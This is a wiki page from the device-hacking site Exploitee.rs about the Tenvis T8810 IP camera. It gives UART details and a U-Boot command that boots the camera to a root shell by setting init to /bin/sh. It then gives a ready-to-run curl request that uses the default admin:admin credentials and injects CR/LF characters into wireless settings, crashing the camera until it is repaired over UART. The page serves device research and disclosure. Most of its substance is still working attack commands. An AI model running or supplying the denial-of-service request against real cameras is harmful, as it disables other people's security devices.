Tenvis T8810

From Exploitee.rs
Revision as of 01:08, 11 August 2017 by CJ (talk | contribs) (UART Root)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."


Tenvis T8810


Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Tenvis T8810 at Amazon


The UART interface on this device is located on the main board, above the power connector [pictured], and runs at 115200, 8n1 and auto boots to a Linux kernel after a three second delay in U-Boot. A root shell can be accessed by interrupting auto boot and hijacking the init environment variable, setting it to /bin/sh, as seen below:

setenv bootargs console=${consoledev},${baudrate} noinitrd mem=${mem} rw ${rootfstype} init=/bin/sh ;sf probe 0 0;sf read ${loadaddr} ${sfkernel} ${filesize}; bootm


Remote Denial of Service


This will leave your device in an unusable state until recovered via UART. Proceed at your own peril.

Sending the following request will cause the device to crash, and remain in an inoperable state until recovered.

curl '' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' --data 'cmd=setwirelessattr&cururl=http%3A%2F%2F192.168.1.88%2Fwifi.html&-wf_ssid=%0Assidgoesheres%0D&-wf_auth=3&-wf_mode=%0Dabcdef&-wf_enc=0&-wf_enable=1&-wf_key=key12345' --compressed​